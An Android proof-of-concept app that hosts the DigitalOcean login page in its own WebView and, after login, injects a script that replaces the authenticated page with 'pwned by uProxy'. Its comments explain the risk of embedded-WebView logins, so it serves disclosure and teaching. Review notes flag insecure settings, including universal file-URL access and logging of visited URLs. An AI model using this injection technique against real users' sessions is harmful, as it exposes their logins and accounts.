uProxy WebView Hijack Proof of Concept
<?xml version="1.0" encoding="utf-8"?>
<!-- Layout with a hint label stacked above a WebView; presumably res/layout/activity_main.xml,
     since MainActivity inflates R.layout.activity_main and looks up the ids txt and wv. -->
<LinearLayout
xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
<!-- Placeholder text: MainActivity.onPageFinished() overwrites it according to the URL the
     WebView reports, which is how the host app shows it can observe the user's navigation. -->
<TextView android:id="@+id/txt"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="This hint is set based on the webview's current URL." />
<!-- The embedded browser surface. MainActivity enables JavaScript on it and attaches
     uProxyWebViewClient, so everything rendered here is under the host app's control. -->
<WebView android:id="@+id/wv"
android:layout_width="wrap_content"
android:layout_height="wrap_content" />
</LinearLayout>
<?xml version="1.0" encoding="utf-8"?>
<!-- Manifest for the proof-of-concept app: one launcher activity plus network access. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="org.uproxy.webviewhijack">
<!-- NOTE(review): allowBackup="true" lets the app's private data be included in device
     backups. WebView cookies and session state are kept in app-private storage, so an app
     that hosts a login session would normally set this to false; confirm it is only the
     project-template default here. -->
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:supportsRtl="true"
android:theme="@style/AppTheme">
<!-- Sole entry point; started from the launcher via the MAIN/LAUNCHER filter below. -->
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
<!-- Required so the WebView can fetch the remote https page that MainActivity loads. -->
<uses-permission android:name="android.permission.INTERNET" />
</manifest>
// Script the host app evaluates inside the embedded page (presumably shipped as
// assets/js/hijack.js, the asset uProxyWebViewClient reads and passes to
// WebView.evaluateJavascript). It is a visible marker only: it discards the
// current document and writes a fixed string, demonstrating that the app which
// owns the WebView has script access to the page the user just logged in to.
// The order matters: the root element is removed before the marker is written.
document.documentElement.remove();
document.write('pwned by uProxy');
package org.uproxy.webviewhijack;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.widget.TextView;
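/**
 * Single-screen demo activity: hosts a WebView pointed at a third-party login
 * page and updates a hint label according to the URL the WebView reports.
 *
 * <p>Security context: this is a proof of concept showing that an app which
 * embeds a login page in its own WebView can observe the user's navigation and
 * run script in the authenticated page. That is the reason login and OAuth
 * flows in native apps are expected to run in the system browser (or a browser
 * tab the app cannot script) rather than in an app-owned WebView.
 */
public class MainActivity extends AppCompatActivity {
    private static final String TAG = "MainActivity";
    private static final String LOGIN_URL = "https://cloud.digitalocean.com/login";
    private static final String DROPLETS_URL = "https://cloud.digitalocean.com/droplets";

    /** Client attached to the WebView; forwards page-finished events back to this activity. */
    private uProxyWebViewClient wvc;

    /**
     * Inflates the layout, wires the custom WebViewClient into the WebView,
     * enables JavaScript and starts loading the login page.
     *
     * @param savedInstanceState state passed through to the superclass
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        wvc = new uProxyWebViewClient(this);
        WebView wv = (WebView) findViewById(R.id.wv);
        wv.setWebViewClient(wvc);
        WebSettings ws = wv.getSettings();
        ws.setJavaScriptEnabled(true);
        // NOTE(review): this setting lets script in file:// pages read content from any
        // origin. Nothing in this activity loads a file:// URL and evaluateJavascript()
        // does not depend on it, so it looks unnecessary here; confirm and remove it
        // rather than carrying it into other code.
        ws.setAllowUniversalAccessFromFileURLs(true);
        wv.loadUrl(LOGIN_URL);
        // Set the initial hint right away; later updates arrive through
        // uProxyWebViewClient.onPageFinished(). getUrl() may return null at this point,
        // which onPageFinished() tolerates.
        onPageFinished(wv, wv.getUrl());
    }

    /**
     * Updates the hint label for the given URL and, on the post-login page,
     * asks the WebViewClient to evaluate its script in the page.
     *
     * <p>URLs are matched by exact string equality, so a query string, fragment
     * or trailing slash falls through to the "unrecognized" branch.
     *
     * @param wv the WebView that reported the URL
     * @param url the URL reported by the WebView; may be {@code null}
     */
    public void onPageFinished(WebView wv, String url) {
        TextView tv = (TextView) findViewById(R.id.txt);
        // String.valueOf() keeps a null URL from reaching Log.i(), which rejects a null
        // message. NOTE(review): URLs can carry session tokens in the query string, and
        // this writes every visited URL to the device log.
        Log.i(TAG, String.valueOf(url));
        // Constant-first equals() so that a null URL is treated as unrecognized
        // instead of throwing NullPointerException.
        if (LOGIN_URL.equals(url)) {
            tv.setText("Log into DigitalOcean below.");
        } else if (DROPLETS_URL.equals(url)) {
            tv.setText("You logged in successfully! Injecting custom script into the page.");
            wvc.injectJS(wv);
        } else {
            tv.setText("The webview loaded an unrecognized URL, no contextual help available: " + url);
        }
    }
}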
package org.uproxy.webviewhijack;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
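/**
 * WebViewClient used by the proof of concept: it loads a script from the app's
 * assets once, relays page-finished events to the hosting activity, and can
 * evaluate the loaded script in whatever page the WebView currently shows.
 *
 * <p>Security context: {@link #injectJS(WebView)} runs app-supplied script in
 * the origin of the loaded page. Any app that owns a WebView can do this, which
 * is why credentials typed into an embedded WebView must be treated as visible
 * to the embedding app.
 */
public class uProxyWebViewClient extends WebViewClient {
    private static final String SCRIPT_ASSET = "js/hijack.js";

    /** Activity that receives the forwarded page-finished callbacks. */
    private final MainActivity parent;
    /** Contents of the script asset, decoded as UTF-8. */
    private final String injectedScript;

    /**
     * Creates the client and eagerly reads the script asset.
     *
     * @param main the hosting activity, also used to reach the asset manager
     * @throws RuntimeException if the asset cannot be read
     */
    public uProxyWebViewClient(MainActivity main) {
        super();
        parent = main;
        injectedScript = readAsset(main, SCRIPT_ASSET);
    }

    /**
     * Reads an asset fully and decodes it as UTF-8.
     *
     * <p>The stream is drained in a loop: {@code available()} is only an
     * estimate and a single {@code read()} may return fewer bytes than
     * requested, so sizing one buffer from it can truncate the script.
     */
    private static String readAsset(MainActivity activity, String assetPath) {
        try (InputStream input = activity.getAssets().open(assetPath);
             ByteArrayOutputStream collected = new ByteArrayOutputStream()) {
            byte[] chunk = new byte[4096];
            int count;
            while ((count = input.read(chunk)) != -1) {
                collected.write(chunk, 0, count);
            }
            return new String(collected.toByteArray(), StandardCharsets.UTF_8);
        } catch (IOException e) {
            // Keep the cause attached so the failure is diagnosable from the stack trace.
            throw new RuntimeException("Could not read " + assetPath, e);
        }
    }

    /**
     * Always returns {@code false}, so every navigation stays inside the
     * WebView instead of being handed to another app.
     */
    @Override
    public boolean shouldOverrideUrlLoading(WebView webview, String url) {
        return false;
    }

    /** Forwards the event to the hosting activity after the default handling. */
    @Override
    public void onPageFinished(WebView wv, String url) {
        super.onPageFinished(wv, url);
        parent.onPageFinished(wv, url);
    }

    /**
     * Evaluates the loaded script in the WebView's current page; the result
     * callback is {@code null}, so any return value is discarded.
     *
     * @param wv the WebView whose current page receives the script
     */
    public void injectJS(WebView wv) {
        wv.evaluateJavascript(injectedScript, null);
    }
}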